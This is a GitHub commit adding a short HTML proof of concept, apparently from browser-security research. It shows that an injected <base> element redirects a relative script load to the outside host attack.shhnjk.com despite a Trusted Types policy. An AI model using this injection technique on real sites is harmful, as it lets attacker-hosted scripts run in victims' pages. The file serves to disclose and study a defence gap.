Create base.html

shhnjk · Apr 15, 2024 · b813d17 · b813d17
1 parent 63e267b
commit b813d17
Showing 1 changed file with 16 additions and 0 deletions.
diff --git a/PoCs/cursed_types/base.html b/PoCs/cursed_types/base.html
@@ -0,0 +1,16 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+  <meta charset="UTF-8">
+  <meta http-equiv="Content-Security-Policy" content="require-trusted-types-for 'script'; trusted-types 'none';">
+</head>
+<body>
+  <script>
+    let attackerControlledString = 'https://attack.shhnjk.com/';
+    const base = document.createElement('base');
+    base.href = attackerControlledString;
+    document.head.appendChild(base);
+  </script>
+  <script src="/foo.js"></script> <!-- Fire! -->
+</body>
+</html>